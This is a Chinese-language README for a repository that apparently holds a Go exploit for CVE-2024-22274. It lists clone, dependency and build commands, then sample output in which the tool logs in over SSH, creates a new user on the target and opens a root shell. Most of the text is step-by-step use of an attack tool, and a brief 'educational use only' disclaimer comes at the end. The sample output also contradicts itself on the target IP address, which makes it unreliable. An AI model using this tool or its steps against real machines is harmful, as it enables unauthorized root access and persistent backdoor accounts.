此仓库包含针对 CVE-2024-22274 的漏洞利用代码。该漏洞利用通过 SSH 在远程机器上创建一个新用户,然后提供一个 root shell。
克隆仓库:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
安装所需的包:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
编译 Go 程序:
go build -o cve-2024-22274-rce main.go
运行编译后的程序:
./cve-2024-22274-rce
按照提示操作:
用户创建后,您将获得目标机器上的 root shell。您可以以新用户身份执行命令。
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
此代码仅供教育用途。请负责任地使用,并且仅用于您有权测试的系统。
本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。